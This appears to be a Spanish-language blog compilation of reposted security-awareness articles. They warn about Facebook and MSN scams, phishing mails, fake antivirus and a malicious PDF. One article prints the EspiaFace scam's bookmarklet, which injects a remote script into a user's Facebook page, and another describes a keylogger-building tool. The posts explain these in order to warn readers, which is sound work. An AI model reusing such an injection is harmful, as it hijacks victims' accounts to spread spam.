El “hackeo”de Facebook en el que no debes de caer

 

No todo lo que brilla es oro, y lo que brilla demasiado te tiene que traer algún tipo de duda. Pero si, como dicen: “la curiosidad mató al gato”. Hoy en día el gato seguro ya se murió tantas veces que es un zombie fantasmas de otra dimensión que nos acecha por diversión. ¿A que me estoy refiriendo? Bueno, paso a copiar un fragmento a ver si ya lo vieron en su Facebook:

Quieren “hackear” – tener el password de la cuenta de alguien en Facebook? Aprovechen esta vulnerabilidad antes de que se den cuenta y la quiten, está funcionando AHORITA!

1. Necesitan utilizar Google Chrome
2. Se meten al perfil de la persona
3. Aprietan la tecla F12
4. Van a la seccion/pestaña que dice “Consola”
5. Copian y pegan el siguiente código , presionan y listo!!! Se abrirá un pop-up con el password de esa persona!!!

Si lo viste, ya sabés que es. Si no, seguro en unos días te llega de una u otra manera. ¿Pero que demonios es? Es una pequeña inyección que podés hacer desde la consola de desarrollador del Google Chrome (que podríamos presumir también funciona en la consola del Firefox) y que realiza una acción simple a la cuál vos le das permiso sin saber. Aunque te venden la idea de que es “hackear contraseñas”. No.

Ese chorizo de código hace algo muy simple la verdad, y aunque no sepas casi nada de código (o nada), viendo un poco de este ves algunas cosas te tienen que llamar la atención. En serio, aunque no entiendan código, siempre véanlo, sospechen, cuestionense que hace cada cosa. Con solo mirar muchas cosas se revelan solas, más cuando son engaños.

¿Quién me responde por que en un chorizo de código habría algo que diga fanpage o LIKE con unos números ahí? Bueno, porque la verdad todo ese chorizo de código que metés en tu consola de desarrollador hace una sola cosa: Etiqueta a todos tus amigos de Facebook y aquel que lo copie se gana un “like” a una fan page que elijas. O sea, cada vez que copias ese código, le das like a una fan page X.

¡Ahhh, pero que bueno, lo voy a usar yo para tener muchos más likes! me dirás. No. Esto no es bueno. Cuando uno se gana likes de manera “ilícita” en Facebook a uno lo pueden sancionar al punto de cerrar tu fanpage. Además, seamos sinceros¿Quién quiere tener +4000 likes falsos donde nadie interactúa contigo? ¿De que te sirve eso?

Ahora seamos bien sinceros ¿Ustedes creen que la gente de Facebook tiene sus contraseñas rondando de manera tan simple por ahí, sin algún tip0 de encripción? ¿Creen que si era  tan fácil de conseguir las contraseñas ajenas, no lo estarían usando hackers grandes para sacar contraseñas más importantes? ¿Creen que Facebook no vería una forma de parchar un agujero tan GRANDE en programación? Porque algo así es un enorme fallo

Bueno, si no me creen, cuando reciban esto y los etiqueten, fíjense en la parte que dice LIKE con unos números al lado y hagan esto: Abran una pestaña, escriban www.facebook.com/ y siganle con los números que ven ahí. Eso es el ID único de la fanpage y así se llama a cualquier cosa en Facebook. Al hacer eso les va a tirar a una fanpage.

Ej: www.facebook.com/331015242937

Así que ya saben, no caigan en esto, nadie puede saber tu contraseña así nomás, Facebook tiene sus falencias, pero no tan estúpidas así como para que se filtren sus contraseñas. No todo lo que parece lindo, lo que brilla, es oro.

¿Pero me etiquetaron, que hago?

Nada, no hay nada que hacer, es una etiqueta y nada más. Dejala ahí no le hagas caso. Solo NO copies el código como dice.

El “hackeo”de Facebook en el que no debes de caer es un Post de El Rincon del Geek

Fraude en Facebook – Averigua quien visita tu Perfil –EspiaFace

Desde hace unos días se ha propagado en rápidamente en Facebook una supuesta manera de saber quien ha visitado tu perfil, el supuesto servicio viene un sitio fraudulento llamado EspiaFace.com, que aquí vamos a desenmascarar, pues cómo ya había comentado hace tiempo que todas las aplicaciones que te prometen saber quien ha visitado tu perfil en Facebook son una estafa esta nueva aplicación no es la excepción.

Viendo cómo funciona el servicio de EspiaFace.com te pide hacer una serie de cosas para supuestamente instalar el servicio en tu cuenta, para eso tienes que insertar un código en tu muro que tal vez muchos no entienden pero se trata de un simple JavaScript que toma de manera aleatoria algunos de tus amigos de tu cuenta y los coloca con un número de visitas ya predefinido.

El primero código que te pide insertar en la barra de direcciones es el siguiente:

javascript:(a=(b=document).createElement('script')).src='//app.espiaface.com/app.js?'+Math.random(),b.body.appendChild(a);void(0)

En el código anterior lo único que hace es agregar el script de espiaface.com a tu Facebook para poder sacar los nombres de tus amigos.

Después te pide compartir el sitio en tu Facebook, supuestamente para que funcione, esto es lo más bajo que he visto para engañar a un usuario, aquí el único objetivo es propagar el fraude.

Y si lo anterior no fue suficiente te pide llenar una encuesta con la que los dueños del servicio ganan dinero, de nuevo engañando al usuario y si no completas la encuesta no podrás terminar, así que todos los que han caido en el fraude han llenado la encuesta.

Finalmente nos pide publicar el siguiente código en nuestro Facebook:

var postmessage = 'Top de visitantes de tu perfil de hoy:
%tf% - 19 visitas
%tf% - 16 visitas
%tf% - 15 visitas
%tf% - 13 visitas
Averigua tu tambien quien te esta mirando entrando en: espiaface.com
Funciona de verdad!';

En el código anterior lo que dice %tf% es donde se colocan de manera aleatoria nombre de tus amigos que se etiquetan en el mensaje, esto lo puedes comprobar haciendo varias veces el mismo procedimiento, donde siempre van a aparecer nombres diferentes y el mismo número de visitas.

Cómo puedes ver, si sabes algo de JavaScript, puedes ver que el supuesto servicio es un fraude total, y lo peor, es que miles de personas en Facebook creen que es verdad y están etiquetando a sus amigos para propagar el fraude.

Así que si tu también fuiste víctima de ser etiquetado por alguno de tus amigos como uno de los que más visitan su perfil cuando ni siquiera es verdad, comparte este este artículo con ellos para que no crean ese engaño.

Post extraído de Techtástico

Saludos,

Sebastián

MSN & Facebook espía - Correo Basura - SpamLoco

En la siguiente captura se puede ver un correo enviado por uno de esos sitios de quien te admite:

Como vemos, el mensaje busca llamar la atención a toda costa, al parecer se podría activar la webcam de los amigos para espiarlos, ver los historiales de conversación y hasta desbloquear a los que nos bloquearon.
Obviamente todo esto es mentira, el objetivo es que los usuarios hagan clic en el enlace y luego ingresen su contraseña para tener acceso a toda su lista de contactos y bombardearlos con Spam, de esta forma hacen crecer el sitio con más visitas y promocionan otros productos.
Estos sitios se montan en base a un script gratuito que se loguea en la cuenta del MSN y analiza la lista de contactos, el problema es que desde hace tiempo no se puede saber si nos bloquearon, ni tampoco si nos eliminaron... por lo que estos sitios ya no funcionan.
Además, no ofrecen ningún tipo de seguridad.
¿Cuál es el sitio que promociona este correo basura? no importa, hoy es uno, mañana es otro y pasado será otro diferente... mientras Google les siga dando vida y Microsoft mire para otro lado con este asunto, van a seguir apareciendo clones del quien te admite y los usuarios van a seguir comprometiendo sus cuentas.

Así que por favor, Tomen conciencia y no hagan clic en este tipo de Anuncios, ya que “No todo lo que brilla es Oro”.-

Contenido extraído del sitio SpamLoco

Saludos,

Sebastián

Fake Scan en página con alerta falsa de Firefox - SpamLoco

Gracias a Panda Security descubro una página falsa que parece ser una alerta de seguridad de Firefox. Es algo más elaborada en comparación a las que había visto hasta ahora, como se puede ver en la siguiente captura, se simula un análisis del sistema y la detección de diversos objetos infectados:

(clic para ver más grande)

Si la víctima cree que se trata de una alerta real y hace clic en el botón "Start Protection", estará descargando el instalador de un falso antivirus.
El atacante propagó el malware mediante cuentas spam de Twitter y enlaces cortos hacia dominios .co.cc (online-alert-policy**.co.cc) donde se cargaba la página falsa. No parece un ataque muy ingenioso, pero con un mensaje spam por aquí y otro por allá, seguramente obtenga alguna víctima para infectarla y cobrar su comisión.

Publicado por SpamLoco

Saludos!

Sebastián

Aplicación falsa para obtener correos @facebook.com - SpamLoco

Los spammers están propagando una aplicación falsa para obtener correos @facebook.com, una vez que las víctimas la instalan en sus perfiles, se publican mensajes automáticos en los muros de todos sus amigos para que también la instalen.

El negocio son las clásicas encuestas que pagan cada vez que se completan, como se puede ver en la captura, las camuflan como un chequeo de seguridad. Sin dudas una de las técnicas más efectivas para engañar a los usuarios y hacer dinero rápido con Facebook, en el blog de Sophos se puede ver un video de su funcionamiento.
Recuerda no instalar aplicaciones extrañas en tu cuenta, una buena práctica para evitar sorpresas de este tipo es verificar cuáles están instaladas y eliminar aquellas que no conozcas o utilices. Esto lo puedes hacer desde el menú Cuenta y Configuración de la privacidad.

Visto en SpamLoco

Saludos!

Sebastián

Cuidado con los falsos antivirus 2011 - SpamLoco

Se termina un año en el cual los falsos antivirus volvieron a hacer estragos como en el 2009, la tendencia indica que seguirán aumentando y apareciendo nuevas variantes.
Muchos simplemente se repetirán cambiando la fecha 2010 por un 2011, un ejemplo de esto es el caso de Security Essentials que se parece al antivirus de Microsoft por su nombre:

Tal vez la mayoría de los mejores nombres para engañar a los usuarios ya se usaron o simplemente, cuando la idea es infectar y robar tarjetas de crédito, cualquiera sirve.
Un claro ejemplo de esto se puede ver en el siguiente video publicado por XyliBox, al "comprar" la licencia del falso antivirus Security Shield, no importa qué información se ingrese, de todas formas "se activará" para que el usuario lo mantenga en su equipo y no sospeche de nada:

Uno de los últimos falsos antivirus detectados y que está infectando a muchos usuarios es Internet Antivirus 2011:

Hace unos días un usuario preguntaba en el foro cómo eliminarlo, dado que la misma pregunta la había realizado en ForoSpyware y ya lo estaban ayudando, lo derivé allí... así que si este programa termina en tu equipo ya tienes los pasos para eliminarlo y desinfectar el sistema.
En los últimos dos años las técnicas utilizadas para propagarlos se han ido optimizando y cada vez logran engañar a más usuarios, en la sección de Falsos Antivirus puedes encontrar muchos ejemplos de las técnicas más utilizadas,conocer cómo atacan es la mejor forma de defenderse.

Publicado Por SpamLoco

Saludos!

Sebastián

WikiLeaks.pdf - Que no te gane la curiosidad - SpamLoco

Symantec ha detectado un ataque dirigido a un organismo gubernamental que aprovecha uno de los temas del momento, WikiLeaks. Se trata de una serie de correos maliciosos que incluyen un adjunto (WikiLeaks.pdf) que simula contener información confidencial.

Al ser abierto se ejecuta un Exploit que busca vulnerabilidades en el lector de Adobe y en caso de encontrarlas infecta el sistema sin que el usuario lo detecte.

Este tipo de ataques son bastante comunes, dada las grandes vulnerabilidades conocidas de Adobe y la falta de actualización por parte de los usuarios, los PDF se han convertido en los últimos años en un gancho muy popular para infectar.
En muchos casos los códigos maliciosos pasan libremente los filtros de protección porque son nuevos o están bien camuflados dentro de los documentos. En este sentido la información que proporciona Symantec es muy interesante, el ejecutable por si sólo era detectado por 25 de los 43 motores de antivirus más populares, mientras que al mismo archivo incrustado en el documento WikiLeaks.pdf sólo lo bloqueaban 9.
Para evitar ser víctima de estos ataques no basta con tener un antivirus, hay que mantener el lector de PDFs actualizado (especialmente el de Adobe) y tener sentido común para evitar abrir documentos no solicitados o enviados por extraños.
Si una persona conocida nos envía un documento sin sentido, lo ideal es preguntarle si realmente lo está compartiendo con nosotros, es muy posible que su correo esté comprometido o su equipo infectado, enviando mensajes Spam a toda su lista de contactos.

Visto en SpamLoco

Saludos!

Sebastián

Mira esta Foto.. Gusano que envía mensajes como si fueran fotos de Facebook - SpamLoco

En la siguiente captura se puede observar un mensaje Spam enviado por MSN, parece ser el enlace a un foto pero en realidad inicia la descarga de un troyano:

Mira esta foto... mensaje spam que descarga un troyano

El mensaje es bastante convincente y el enlace utilizado por los atacantes parece ser realmente de Facebook, aunque si se mira con atención se notará que el dominio en realidad es yzin .com.
Este contacto horas antes también me había enviado otro mensaje dedicándome una canción mp3, su equipo posiblemente esté infectado o su cuenta de correo comprometida.
No es extraño que algunos servicios fraudulentos que solicitan usuario y contraseña, luego usen esa información para enviar mensajes instantáneos.
En estos casos hay que probar algún limpiador del MSN, analizar el equipo de forma completa y luego cambiar la contraseña de Hotmail.

Post Extraído de SpamLoco

Saludos!

Sebastián

Falso antivirus que solicita desinstalar el antivirus legítimo - SpamLoco

Algunos malwares tienen la capacidad de buscar antivirus instalados y desactivarlos, de esta forma con el campo abierto pueden descargar e instalar todo tipo de programas para controlar el equipo y robar información.

Pero para que esto suceda es necesario superar los mecanismos de seguridad del propio antivirus, algo que no es muy sencillo de lograr. Por esta razón los ciber-delincuentes están implementando la ingeniería social para que sea el propio usuario el que desinstale el antivirus.

Esto es lo que hace un nuevo antivirus falso por medio de una advertencia que inicia la desinstalación legítima del programa, al usuario no le queda otra que hacer clic en OK:

Advertencia generada por el malware

En este ejemplo, se detecta al antivirus de Symantec y se solicita su desinstalación para poder instalar el falso antivirus:

Antivirus falso que infecta el equipo

El programa fraudulento es un clon de Protección Center, Paladín Antivirus y otros varios ejemplares. Una vez instalado infecta el equipo descargando nuevos malwares y generando diversos problemas, además intenta engañar a las víctimas con la detección de amenazas inexistentes y la compra de una licencia.

Si tienes problemas para eliminar algún falso antivirus puedes pasar por el foro de SpamLoco en busca de ayuda, o visitar el Sitio de SpamLoco y encontrar varios ejemplos de antivirus falsos y distintos métodos que se suelen utilizar para infectar a los usuarios.

Contenido extraído de SpamLoco

Saludos!

Sebastián

Facebook Hacker, esta vez la aplicación es Real - SpamLoco

Les dejo una Publicación extraída de SpamLoco sobre La siguiente aplicación que permite crear troyanos para infectar equipos y robar usuarios y contraseñas. Simplemente se debe configurar un correo de destino para los datos robados y presionar el botón Build para crear un archivo .exe que las víctimas deberán ejecutar.

El archivo malicioso instala un Keylogger que monitorea los navegadores y programas de mensajería como el MSN, capturando lo que se presiona en el teclado, luego la información robada es enviada por correo. Para evitar ser detectado, Facebook Hacker también busca antivirus instalados para desactivarlos.

Como se puede ver, cualquiera podría utilizar esta aplicación de forma malintencionada... por si se te ocurre buscarla ten en cuenta que la red está llena de Fakes (Falsos programas), aunque se vean iguales pueden ser clones falsos que en realidad infectan tu propio equipo para controlarlo.

Consejos para estar a salvo:

Recuerda mantener tu antivirus actualizado y evitar ejecutar archivos desconocidos que descargues o recibas por correo o chat, si son enviados por contactos conocidos al menos antes realiza un escaneo sobre el archivo para asegurarte. Si deseas realizar un escaneo online para obtener una segunda opinión, puedes usar VirusTotal.

Extraído de SpamLoco

Saludos!

Sebastián

Cuidado con los sitios “Quien no te admite en el MSN”

Si eres una persona avanzada quizás ya sepas de esto, pero las personas que recién inician no tienen conocimiento acerca del riesgo que representan estos sitios. Hay servicios que prometen decirte quién te admite y quién no en el Messenger, pero la mayoría de estos sitios constituyen un riesgo para tu cuenta de correo.

Aquí les dejo unas Capturas de los correos que fui recibiendo en estos últimos años:

   

Primeramente, al ingresar tus datos en la página fraudulenta y luego enviarlos, tu usuario y contraseña se envían a una base de datos que luego el creador de la web puede consultarla, pudiendo así enviar correo no deseado a tus amigos, publicidad del mismo servicio (que propaga el mal), conectarse a cada momento en tu Messenger con el Nick cambiado, entre otras cosas.

Es por eso que recomiendo NO utilizar estos servicios; si te llega un correo que te promete saber todo acerca de quién no te admite en el Messenger es mentira, ignóralo. Piensa que Microsoft no permitiría revisar datos privados de las personas. Dirás que algunos servicios avisan que “No guardan tus datos personales”, pero esto es mentira, si lo guardan. Así que por el bien de tu cuenta, haz caso a esta recomendación, que en internet hay cosas buenas, pero también engaños.

Saludos!

Sebastián

Spam en Twitter para obtener un iPad gratis - SpamLoco

Desde F-Secure dan a conocer una campaña de Spam que promete un iPad a cambio de convertirse en tester de unas supuestas aplicaciones. Para registrarse es necesario completar dos pasos:

Primero hay que aceptar una aplicación de Twitter, al otorgarle acceso publica mensajes automáticamente para promocionar el sitio fraudulento. El segundo paso carga una página en la cual se solicita un número móvil para recibir publicidad, se trata de un sistema de afiliados y la acción a tomar puede variar según la IP del visitante.

De esta forma los estafadores ganan dinero y promocionan la campaña por Twitter, engañando a los usuarios que se quedan esperando el iPhone agrandado iPad de Apple :)

Extraído de SpamLoco

Saludos!

Sebastián

Correo falso de Facebook, para robar contraseña de Hotmail

 

Correo falso de Facebook, poema y pase XXX para robar contraseña de Hotmail

Extraido de SpamLoco:

“Hace unos días dejaron un comentario en el blog ofreciendo contraseñas por 80 dólares, me contacté como si fuera un nuevo cliente y lo que me enviaron para intentar robar mi contraseña fue lo siguiente:

El correo simula ser una notificación de Facebook, al parecer me etiquetaron en una foto. El enlace como se puede ver en la captura apunta a una dirección extraña, en este caso un dominio .com.ar.

Al hacer clic se abre una página falsa de Hotmail, al introducir cualquier contraseña se envía al lamer y se efectúa una redirección a hotmail.com.

Además también recibí un pase libre para una página de sexo y un poema de amor:

 Correo fraudulento con enlace malicioso

Al igual que el ejemplo anterior, el enlace apunta a una dirección sospechosa que carga una página falsa de Hotmail. En este caso el dominio utilizado es un .WS y como se puede apreciar está bastante camuflado.

Recuerda observar siempre las direcciones de los enlaces y no ingresar tu contraseña en páginas que la solicitan luego de hacer clic en un correo, eso es muy sospechoso.

Por otro lado, para aquellos que se toman el robo de contraseñas como un chiste o pasatiempo, tengan en cuenta que están cometiendo un delito y si no están seguros de lo que hacen se pueden meter en problemas. Ante una denuncia, la policía los puede identificar sin mayores dificultades :)

Ver También: Como Denunciar correos y Páginas de Phishing”

Saludos!

Sebastián